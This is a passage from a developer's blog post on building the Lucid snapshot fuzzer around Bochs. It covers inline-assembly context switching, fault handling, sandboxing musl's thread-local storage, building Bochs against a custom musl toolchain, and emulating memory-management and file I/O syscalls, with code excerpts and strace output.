    "add r14, 0x8",     // mode is at offset 0x8 from base
    "mov r14, [r14]",
    "cmp r14d, 0x0",
    "je save_bochs",

    // We're in Lucid mode so save Lucid GPRs
    "save_lucid: ",
    "mov r14, r15",
    "add r14, 0x10",    // lucid_regs is at offset 0x10 from base
    "jmp save_gprs",             

    // We're in Bochs mode so save Bochs GPRs
    "save_bochs: ",
    "mov r14, r15",
    "add r14, 0x90",    // bochs_regs is at offset 0x90 from base
    "jmp save_gprs",

You can see that once we hit the context_switch function we save the CPU flags before we do anything that would affect them, then we save a couple of registers that we use as scratch registers. Then we’re free to check the value of context->mode in order to determine what mode of execution we’re in. Based on that value, we are able to know what register bank to use to save our general-purpose registers. So yes, we do have to hardcode some offsets, but I believe overall this is a much better API and system for context-switching callees and the data-structure itself should be relatively stable at this point and not require massive refactoring.

Introducing Faults

Since the last blog-post, I’ve introduced the concept of Fault which is an error class that is reserved for instances when some sort of error is encountered during either context-switching code or syscall-handling. This error is distinct from our highest-level error LucidErr. Ultimately, these faults are plumbed back up to Lucid when they are encountered so that Lucid can handle them. As of this moment, Lucid calls any Fault fatal.

We are able to plumb these back up to Lucid because before starting Bochs execution we now save Lucid’s state and context-switch into starting Bochs:

pub fn start_bochs(context: &mut LucidContext) {
    // Set the execution mode and the reason why we're exiting the Lucid VM
    context.mode = ExecMode::Lucid;
    context.exit_reason = VmExit::StartBochs;

    // Set up the calling convention and then start Bochs by context switching
    unsafe {
            "push r15", // Callee-saved register we have to preserve
            "mov r15, {0}", // Move context into R15
            "call qword ptr [r15]", // Call context_switch
            "pop r15",  // Restore callee-saved register
            in(reg) context as *mut LucidContext,

We make some changes to the execution context, namely marking the execution mode (Lucid-mode) and setting the reason why we’re context-switching (to start Bochs). Then in the inline assembly, we call the function pointer at offset 0 in the execution context structure:

// Execution context that is passed between Lucid and Bochs that tracks
// all of the mutable state information we need to do context-switching
pub struct LucidContext {
    pub context_switch: usize,  // Address of context_switch()

So then our Lucid state is saved in the context_switch routine and we are then passed to this logic:

// Handle Lucid context switches here
    if LucidContext::is_lucid_mode(context) {
        match exit_reason {
            // Dispatch to Bochs entry point
            VmExit::StartBochs => {
            _ => {
                fault!(context, Fault::BadLucidExit);

Finally, we call jump_to_bochs:

// Standalone function to literally jump to Bochs entry and provide the stack
// address to Bochs
fn jump_to_bochs(context: *mut LucidContext) {
    // RDX: we have to clear this register as the ABI specifies that exit
    // hooks are set when rdx is non-null at program start
    // RAX: arbitrarily used as a jump target to the program entry
    // RSP: Rust does not allow you to use 'rsp' explicitly with in(), so we
    // have to manually set it with a `mov`
    // R15: holds a pointer to the execution context, if this value is non-
    // null, then Bochs learns at start time that it is running under Lucid
    // We don't really care about execution order as long as we specify clobbers
    // with out/lateout, that way the compiler doesn't allocate a register we 
    // then immediately clobber
    unsafe {
            "xor rdx, rdx",
            "mov rsp, {0}",
            "mov r15, {1}",
            "jmp rax",
            in(reg) (*context).bochs_rsp,
            in(reg) context,
            in("rax") (*context).bochs_entry,
            lateout("rax") _,   // Clobber (inout so no conflict with in)
            out("rdx") _,       // Clobber
            out("r15") _,       // Clobber

Full-blown context-switching like this, allows us to encounter a Fault and then pass that error back to Lucid for handling. In the fault_handler, we set the Fault type in the execution context, and then we attempt to restore execution back to Lucid:

// Where we handle faults that may occur when context-switching from Bochs. We
// just want to make the fault visible to Lucid so we set it in the context,
// then we try to restore Lucid execution from its last-known good state
pub fn fault_handler(contextp: *mut LucidContext, fault: Fault) {
    let context = unsafe { &mut *contextp };
    match fault {
        Fault::Success => context.fault = Fault::Success,

    // Attempt to restore Lucid execution
// We use this function to restore Lucid execution to its last known good state
// This is just really trying to plumb up a fault to a level that is capable of
// discerning what action to take. Right now, we probably just call it fatal. 
// We don't really deal with double-faults, it doesn't make much sense at the
// moment when a single-fault will likely be fatal already. Maybe later?
fn restore_lucid_execution(contextp: *mut LucidContext) {
    let context = unsafe { &mut *contextp };
    // Fault should be set, but change the execution mode now since we're
    // jumping back to Lucid
    context.mode = ExecMode::Lucid;

    // Restore extended state
    let save_area = context.lucid_save_area;
    let save_inst = context.save_inst;
    match save_inst {
        SaveInst::XSave64 => {
            // Retrieve XCR0 value, this will serve as our save mask
            let xcr0 = unsafe { _xgetbv(0) };

            // Call xrstor to restore the extended state from Bochs save area
            unsafe { _xrstor64(save_area as *const u8, xcr0); }             
        SaveInst::FxSave64 => {
            // Call fxrstor to restore the extended state from Bochs save area
            unsafe { _fxrstor64(save_area as *const u8); }
        _ => (), // NoSave

    // Next, we need to restore our GPRs. This is kind of different order than
    // returning from a successful context switch since normally we'd still be
    // using our own stack; however right now, we still have Bochs' stack, so
    // we need to recover our own Lucid stack which is saved as RSP in our 
    // register bank
    let lucid_regsp = &context.lucid_regs as *const _;

    // Move that pointer into R14 and restore our GPRs. After that we have the
    // RSP value that we saved when we called into context_switch, this RSP was
    // then subtracted from by 0x8 for the pushfq operation that comes right
    // after. So in order to recover our CPU flags, we need to manually sub
    // 0x8 from the stack pointer. Pop the CPU flags back into place, and then 
    // return to the last known good Lucid state
    unsafe {
            "mov r14, {0}",
            "mov rax, [r14 + 0x0]",
            "mov rbx, [r14 + 0x8]",
            "mov rcx, [r14 + 0x10]",
            "mov rdx, [r14 + 0x18]",
            "mov rsi, [r14 + 0x20]",
            "mov rdi, [r14 + 0x28]",
            "mov rbp, [r14 + 0x30]",
            "mov rsp, [r14 + 0x38]",
            "mov r8, [r14 + 0x40]",
            "mov r9, [r14 + 0x48]",
            "mov r10, [r14 + 0x50]",
            "mov r11, [r14 + 0x58]",
            "mov r12, [r14 + 0x60]",
            "mov r13, [r14 + 0x68]",
            "mov r15, [r14 + 0x78]",
            "mov r14, [r14 + 0x70]",
            "sub rsp, 0x8",
            in(reg) lucid_regsp,

As you can see, restoring Lucid state and resuming execution is quite involved, One tricky thing we had to deal with was the fact that right now, when a Fault occurs, we are likely operating in Bochs mode which means that our stack is Bochs’ stack and not Lucid’s. So even though this is technically just a context-switch, we had to change the order around a little bit to pop Lucid’s saved state into our current state and resume execution. Now when Lucid calls functions that context-switch, it can simply check the β€œreturn” value of such functions by checking if there was a Fault noted in the execution context like so:

	// Start executing Bochs
    prompt!("Starting Bochs...");
    start_bochs(&mut lucid_context);

    // Check to see if any faults occurred during Bochs execution
    if !matches!(lucid_context.fault, Fault::Success) {

Pretty neat imo!

Sandboxing Thread-Local-Storage

Coming into this project, I honestly didn’t know much about thread-local-storage (TLS) except that it was some magic per-thread area of memory that did stuff. That is still the entirety of my knowledge really, except now I’ve seen some code that allocates that memory and initializes it, which helps me appreciate what is really going on. Once I implemented the Fault system discussed above, I noticed that Lucid would segfault when exiting. After some debugging, I realized it was calling a function pointer that was a bogus address. How could this have happened? Well, after some digging, I noticed that right before that function call, an offset of the fs register was used to load the address from memory. Typically, fs is used to access TLS. So at that point, I had a strong suspicion that Bochs had somehow corrupted the value of my fs register. So I did a quick grep through Musl looking for fs register access and found the following:

/* Copyright 2011-2012 Nicholas J. Kain, licensed under standard MIT license */
.global __set_thread_area
.hidden __set_thread_area
.type __set_thread_area,@function
	mov %rdi,%rsi           /* shift for syscall */
	movl $0x1002,%edi       /* SET_FS register */
	movl $158,%eax          /* set fs segment to */
	syscall                 /* arch_prctl(SET_FS, arg)*/

So this function, __set_thread_area uses an inline syscall instruction to call arch_prctl to directly manipulate the fs register. This made a lot of sense because, if the syscall instruction was indeed called, we wouldn’t intercept this with our syscall sandboxing infrastructure because we never instrumented this, we’ve only instrumented what boils down to the syscall() function wrapper in Musl. So this would escape our sandbox and directly manipulate fs. Sure enough, I discovered that this function is called during TLS initialization in src/env/__init_tls.c:

int __init_tp(void *p)
	pthread_t td = p;
	td->self = td;
	int r = __set_thread_area(TP_ADJ(p));
	if (r < 0) return -1;
	if (!r) libc.can_do_threads = 1;
	td->detach_state = DT_JOINABLE;
	td->tid = __syscall(SYS_set_tid_address, &__thread_list_lock);
	td->locale = &libc.global_locale;
	td->robust_list.head = &td->robust_list.head;
	td->sysinfo = __sysinfo;
	td->next = td->prev = td;
	return 0;

So in this __init_tp function, we’re given a pointer and then we call TP_ADJ macro to do some arithmetic on the pointer and pass that value to __set_thread_area so that fs is manipulated. Great, now how do we sandbox this? I wanted to avoid messing with the inline assembly in __set_thread_area itself, so I just changed the source so that Musl would instead just utilize the syscall() wrapper function which calls our instrumented syscall functions under the hood, like so:

#ifndef ARCH_SET_FS
#define ARCH_SET_FS 0x1002
#endif /* ARCH_SET_FS */

int __init_tp(void *p)
	pthread_t td = p;
	td->self = td;
	int r = syscall(SYS_arch_prctl, ARCH_SET_FS, TP_ADJ(p));
	//int r = __set_thread_area(TP_ADJ(p));

Now, we can intercept this syscall in Lucid and effectively do nothing really. As long as there are not other direct accesses to fs (and there might be still!), we should be fine here. I also adjusted the Musl code so that if we’re running under Lucid, we provide a TLS-area via the execution context by just creating a mock area of what Musl calls the builtin_tls:

static struct builtin_tls {
	char c;
	struct pthread pt;
	void *space[16];
} builtin_tls[1];

So now, when __init_tp is called, the pointer it is giving points to our own TLS block of memory we’ve created in the execution context so that we now have access to things like errno in Lucid:

if (libc.tls_size > sizeof builtin_tls) {
#ifndef SYS_mmap2
#define SYS_mmap2 SYS_mmap
		__asm__ __volatile__ ("int3"); // Added by me just in case
		mem = (void *)__syscall(
			0, libc.tls_size, PROT_READ|PROT_WRITE,
		/* -4095...-1 cast to void * will crash on dereference anyway,
		 * so don't bloat the init code checking for error codes and
		 * explicitly calling a_crash(). */
	} else {
		// Check to see if we're running under Lucid or not
		if (!g_lucid_ctx) { mem = builtin_tls; }
		else { mem = &g_lucid_ctx->tls; }

	/* Failure to initialize thread pointer is always fatal. */
	if (__init_tp(__copy_tls(mem)) < 0)
pub struct Tls {
    padding0: [u8; 8], // char c
    padding1: [u8; 52], // Padding to offset of errno which is 52-bytes
    pub errno: i32,
    padding2: [u8; 144], // Additional padding to get to 200-bytes total
    padding3: [u8; 128], // 16 void * values

So now for example, if during a read syscall, we get passed a NULL buffer, we can return an error code and set errno appropriately from the syscall handler in Lucid:

            // Now we need to make sure the buffer passed to read isn't NULL
            let buf_p = a2 as *mut u8;
            if buf_p.is_null() {
                context.tls.errno = libc::EINVAL;
                return -1_i64 as u64;

There may still be other accesses to fs and gs that I’m not currently sandboxing, but we haven’t reached that part of development yet.

Building Bochs

I put off building and loading Bochs for a long time because I wanted to make sure I had the foundations of context-switching and syscall-sandboxing built. I also was worried that it would be difficult since getting vanilla Bochs built --static-pie was difficult for me initially. To complicate building Bochs in general, we need to build Bochs against our custom Musl. This means that we’ll need to have a compiler that we can tell to ignore whatever standard C library it normally uses and use our custom Musl libc instead. This proved quite tedious and difficult for me. Once I was successful, I came to realize that wasn’t enough. Bochs, being a C++ code base, also required access to standard C++ library functions. This simply could not work as I had done previously with the test program because I didn’t have a C++ library that we could use that had been built against our custom Musl.

Luckily, there is an awesome project called the musl-cross-make project, which aims to help people build their own Musl toolchains from scratch. This is perfect for what we need because we require a complete toolchain. We need to support the C++ standard library and it needs to be built with our custom Musl. So to do this, we use the The GNU C++ Library, libstdc++, that is part of the gcc project.

musl-cross-make will pull down all of constituent tool-chain components and create a from scratch tool chain that will utilize a Musl libc and a libstdc++ built against that Musl. Then all we have to do for our purposes, is recompile that Musl libc with our custom patches that we make with Lucid, and then use the tool chain to compile Bochs as --static-pie. It really was as simple as:

  • git clone musl-cross-make
  • configure an x86_64 tool chain target
  • build the tool chain
  • go into its Musl directory, apply our Musl patches
  • configure Musl to build/install into the musl-cross-make output directory
  • re-build Musl libc
  • configure Bochs to use the new toolchain and set the --static-pie flag

This is the Bochs configuration file that I used to build Bochs:


CFLAGS="-Wall --static-pie -fPIE"

export CC
export CXX
export CFLAGS

./configure --enable-sb16 \
                --enable-all-optimizations \
                --enable-long-phy-address \
                --enable-a20-pin \
                --enable-cpu-level=6 \
                --enable-x86-64 \
                --enable-vmx=2 \
                --enable-pci \
                --enable-usb \
                --enable-usb-ohci \
                --enable-usb-ehci \
                --enable-usb-xhci \
                --enable-busmouse \
                --enable-e1000 \
                --enable-show-ips \
                --enable-avx \

This was enough to get the Bochs binary I wanted to begin testing with. In the future we will likely need to change this configuration file, but for now this works. The repository should have more detailed build instructions and also will include already built Bochs binary.

Implementing a Simple MMU

Now that we are loading and executing Bochs and sandboxing it from syscalls, there are several new syscalls that we need to implement such as brk, mmap, and munmap. Our test program was very simple and we hadn’t come across these syscalls yet.

These three syscalls all manipulate memory in some way, so I decided that we needed to implement some sort of Memory-Manager (MMU). To keep things as simple as possible, I decided that, at least for now, we will not be worrying about freeing memory, re-using memory, or unmapping memory. We will simply pre-allocate a pool of memory for both brk calls to use and mmap calls to use, so two pre-allocated pools of memory. We can also just hang the MMU structure off of the execution context so that we always have access to it during syscalls and context-switches.

So far, Bochs really only cares to map memory in that is READ/WRITE, so that works in our favor in terms of simplicity. So to pre-allocate the memory pools, we just do a fairly large mmap call ourselves when we set up the MMU as part of the execution context initialization routine:

// Structure to track memory usage in Bochs
pub struct Mmu {
    pub brk_base: usize,        // Base address of brk region, never changes
    pub brk_size: usize,        // Size of the program break region
    pub curr_brk: usize,        // The current program break
    pub mmap_base: usize,       // Base address of the `mmap` pool
    pub mmap_size: usize,       // Size of the `mmap` pool
    pub curr_mmap: usize,       // The current `mmap` page base
    pub next_mmap: usize,       // The next allocation base address

impl Mmu {
    pub fn new() -> Result<Self, LucidErr> {
        // We don't care where it's mapped
        let addr = std::ptr::null_mut::<libc::c_void>();

        // Straight-forward
        let length = (DEFAULT_BRK_SIZE + DEFAULT_MMAP_SIZE) as libc::size_t;

        // This is normal
        let prot = libc::PROT_WRITE | libc::PROT_READ;

        // This might change at some point?
        let flags = libc::MAP_ANONYMOUS | libc::MAP_PRIVATE;

        // No file backing
        let fd = -1 as libc::c_int;

        // No offset
        let offset = 0 as libc::off_t;

        // Try to `mmap` this block
        let result = unsafe {

        if result == libc::MAP_FAILED {
            return Err(LucidErr::from("Failed `mmap` memory for MMU"));

        // Create MMU
        Ok(Mmu {
            brk_base: result as usize,
            brk_size: DEFAULT_BRK_SIZE,
            curr_brk: result as usize,
            mmap_base: result as usize + DEFAULT_BRK_SIZE,
            mmap_size: DEFAULT_MMAP_SIZE,
            curr_mmap: result as usize + DEFAULT_BRK_SIZE,
            next_mmap: result as usize + DEFAULT_BRK_SIZE,

Handling memory-management syscalls actually wasn’t too difficult, there were some gotcha’s early on but we managed to get something working fairly quickly.

Handling brk

brk is a syscall used to increase the size of the data segment in your program. So a typical pattern you’ll see is that the program will call brk(0), which will return the current program break address, and then if the program wants 2 pages of extra memory, it will then call brk(base + 0x2000), and you can see that in the Bochs strace output:

[devbox:~/bochs/bochs-2.7]$ strace ./bochs
execve("./bochs", ["./bochs"], 0x7ffda7f39ad0 /* 45 vars */) = 0
arch_prctl(ARCH_SET_FS, 0x7fd071a738a8) = 0
set_tid_address(0x7fd071a739d0)         = 289704
brk(NULL)                               = 0x555555d7c000
brk(0x555555d7e000)                     = 0x555555d7e000

So in our syscall handler, I have the following logic for brk:

// brk
        0xC => {
            // Try to update the program break
            if context.mmu.update_brk(a1).is_err() {
                fault!(contextp, Fault::InvalidBrk);

            // Return the program break
            context.mmu.curr_brk as u64

This is effectively a wrapper around the update_brk method we’ve implemented for Mmu, so let’s look at that:

// Logic for handling a `brk` syscall
    pub fn update_brk(&mut self, addr: usize) -> Result<(), ()> {
        // If addr is NULL, just return nothing to do
        if addr == 0 { return Ok(()); }

        // Check to see that the new address is in a valid range
        let limit = self.brk_base + self.brk_size;
        if !(self.curr_brk..limit).contains(&addr) { return Err(()); }

        // So we have a valid program break address, update the current break
        self.curr_brk = addr;


So if we get a NULL argument in a1, we have nothing to do, nothing in the current MMU state needs adjusting, we just simply return the current program break. If we get a non-NULL argument, we do a sanity check to make sure that our pool of brk memory is large enough to accomodate the request and if it is, we adjust the current program break and return that to the caller.

Remember, this is so simple because we’ve already pre-allocated all of the memory, so we don’t need to actually do much here besides adjust what amounts to an offset indicating what memory is valid.

Handling mmap and munmap

mmap is a bit more involved, but still easy to track through. For mmap calls, theres more state we need to track because there are essentially β€œallocations” taking place that we need to keep in mind. Most mmap calls will have a NULL argument for address because they don’t care where the memory mapping takes place in virtual memory, in that case, we default to our main method do_mmap that we’ve implemented for Mmu:

// If a1 is NULL, we just do a normal mmap
            if a1 == 0 {
                if context.mmu.do_mmap(a2, a3, a4, a5, a6).is_err() {
                    fault!(contextp, Fault::InvalidMmap);

                // Succesful regular mmap
                return context.mmu.curr_mmap as u64;
// Logic for handling a `mmap` syscall with no fixed address support
    pub fn do_mmap(
        &mut self,
        len: usize,
        prot: usize,
        flags: usize,
        fd: usize,
        offset: usize
    ) -> Result<(), ()> {
        // Page-align the len
        let len = (len + PAGE_SIZE - 1) & !(PAGE_SIZE - 1);

        // Make sure we have capacity left to satisfy this request
        if len + self.next_mmap > self.mmap_base + self.mmap_size { 
            return Err(());

        // Sanity-check that we don't have any weird `mmap` arguments
        if prot as i32 != libc::PROT_READ | libc::PROT_WRITE {
            return Err(())

        if flags as i32 != libc::MAP_PRIVATE | libc::MAP_ANONYMOUS {
            return Err(())

        if fd as i64 != -1 {
            return Err(())

        if offset != 0 {
            return Err(())

        // Set current to next, and set next to current + len
        self.curr_mmap = self.next_mmap;
        self.next_mmap = self.curr_mmap + len;

        // curr_mmap now represents the base of the new requested allocation

Very simply, we do some sanity checks to make sure we have enough capacity to satisfy the allocation in our mmap memory pool, we check to make sure the other arguments are what we’re anticipating, and then we simply update the current offset and the next offset. This way we know next time where to allocate from while also being able to return the current allocation base back to the caller.

There is also a case where mmap will be called with a non-NULL address and MAP_FIXED flags meaning that the address matters to the caller and the mapping should take place at the provided virtual address. Right now, this occurs early on in the Bochs process:

[devbox:~/bochs/bochs-2.7]$ strace ./bochs
execve("./bochs", ["./bochs"], 0x7ffda7f39ad0 /* 45 vars */) = 0
arch_prctl(ARCH_SET_FS, 0x7fd071a738a8) = 0
set_tid_address(0x7fd071a739d0)         = 289704
brk(NULL)                               = 0x555555d7c000
brk(0x555555d7e000)                     = 0x555555d7e000
mmap(0x555555d7c000, 4096, PROT_NONE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x555555d7c000

For this special case, there is really nothing for us to do since that address is in the brk pool. We already know about that memory, we’ve already created it, so this last mmap call you see above amounts to a NOP for us, there is nothing to do but return the address back to the caller.

At this time, we don’t support MAP_FIXED calls for non-brk pool memory.

For munmap, we also treat this operation as a NOP and return success to the user because we’re not concerned with freeing or re-using memory at this time.

You can see that Bochs does quite a bit of brk and mmap calls and our fuzzer is now capable of handling them all via our MMU:

brk(NULL)                               = 0x555555d7c000
brk(0x555555d7e000)                     = 0x555555d7e000
mmap(0x555555d7c000, 4096, PROT_NONE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x555555d7c000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bde000
mmap(NULL, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bda000
mmap(NULL, 4194324, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd06f7ff000
mmap(NULL, 73728, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc8000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc7000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc6000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc5000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc4000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc3000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc2000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc1000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc0000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbe000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbd000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbc000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbb000
munmap(0x7fd071bbb000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbb000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bba000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb9000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb8000
brk(0x555555d7f000)                     = 0x555555d7f000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb6000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb5000
munmap(0x7fd071bb5000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb5000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb4000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb3000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb2000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb1000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb0000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071baf000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bae000
munmap(0x7fd071bae000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bae000
munmap(0x7fd071bae000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bae000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bad000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bab000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071baa000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba8000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba7000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba6000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba5000
munmap(0x7fd071ba5000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba5000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba3000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba1000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba0000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b9e000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b9d000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b9b000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b99000
munmap(0x7fd071b99000, 8192)            = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b99000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b97000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b96000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b94000
munmap(0x7fd071b94000, 8192)            = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b94000

File I/O

With the MMU out of the way, we needed a way to do file input and output. Bochs is trying to open its configuration file:

open(".bochsrc", O_RDONLY|O_LARGEFILE)  = 3
close(3)                                = 0
writev(2, [{iov_base="00000000000i[      ] ", iov_len=21}, {iov_base=NULL, iov_len=0}], 200000000000i[      ] ) = 21
writev(2, [{iov_base="reading configuration from .boch"..., iov_len=36}, {iov_base=NULL, iov_len=0}], 2reading configuration from .bochsrc
) = 36
open(".bochsrc", O_RDONLY|O_LARGEFILE)  = 3
read(3, "# You may now use double quotes "..., 1024) = 1024
read(3, "================================"..., 1024) = 1024
read(3, "ig_interface: win32config\n#confi"..., 1024) = 1024
read(3, "ace to AT&T's VNC viewer, cross "..., 1024) = 1024

The way I’ve approached this for now is to pre-read and store the contents of required files in memory when I initialize the Bochs execution context. This has some advantages, because I can imagine a future when we’re fuzzing something and Bochs needs to do file I/O on a disk image file or something else, and it’d be nice to just already have that file read into memory and waiting for usage. Emulating the file I/O syscalls then becomes very straightforward, we really only need to keep a few metadata and the file contents themselves:

pub struct FileTable {
    files: Vec<File>,

impl FileTable {
    // We will attempt to open and read all of our required files ahead of time
    pub fn new() -> Result<Self, LucidErr> {
        // Retrieve .bochsrc
        let args: Vec<String> = std::env::args().collect();

        // Check to see if we have a "--bochsrc-path" argument
        if args.len() < 3 || !args.contains(&"--bochsrc-path".to_string()) {
            return Err(LucidErr::from("No `--bochsrc-path` argument"));

        // Search for the value
        let mut bochsrc = None;
        for (i, arg) in args.iter().enumerate() {
            if arg == "--bochsrc-path" {
                if i >= args.len() - 1 {
                    return Err(
                        LucidErr::from("Invalid `--bochsrc-path` value"));
                bochsrc = Some(args[i + 1].clone());

        if bochsrc.is_none() { return Err(
            LucidErr::from("No `--bochsrc-path` value provided")); }
        let bochsrc = bochsrc.unwrap();

        // Try to read the file
        let Ok(data) = read(&bochsrc) else { 
            return Err(LucidErr::from(
                &format!("Unable to read data BLEGH from '{}'", bochsrc)));

        // Create a file now for .bochsrc
        let bochsrc_file = File {
            fd: 3,
            path: ".bochsrc".to_string(),
            contents: data.clone(),
            cursor: 0,

        // Insert the file into the FileTable
        Ok(FileTable {
            files: vec![bochsrc_file],

    // Attempt to open a file
    pub fn open(&mut self, path: &str) -> Result<i32, ()> {
        // Try to find the requested path
        for file in self.files.iter() {
            if file.path == path {
                return Ok(file.fd);

        // We didn't find the file, this really should never happen?

    // Look a file up by fd and then return a mutable reference to it
    pub fn get_file(&mut self, fd: i32) -> Option<&mut File> {
        self.files.iter_mut().find(|file| file.fd == fd)

pub struct File {
    pub fd: i32,            // The file-descriptor Bochs has for this file
    pub path: String,       // The file-path for this file
    pub contents: Vec<u8>,  // The actual file contents
    pub cursor: usize,      // The current cursor in the file

So when Bochs asks to read a file and provides the fd, we just check the FileTable for the correct file and then read its contents from the File::contents buffer and then update the cursor struct member to keep track of where in the file our current offset is.

// read
        0x0 => {
            // Check to make sure we have the requested file-descriptor
            let Some(file) = context.files.get_file(a1 as i32) else {
                println!("Non-existent file fd: {}", a1);
                fault!(contextp, Fault::NoFile);

            // Now we need to make sure the buffer passed to read isn't NULL
            let buf_p = a2 as *mut u8;
            if buf_p.is_null() {
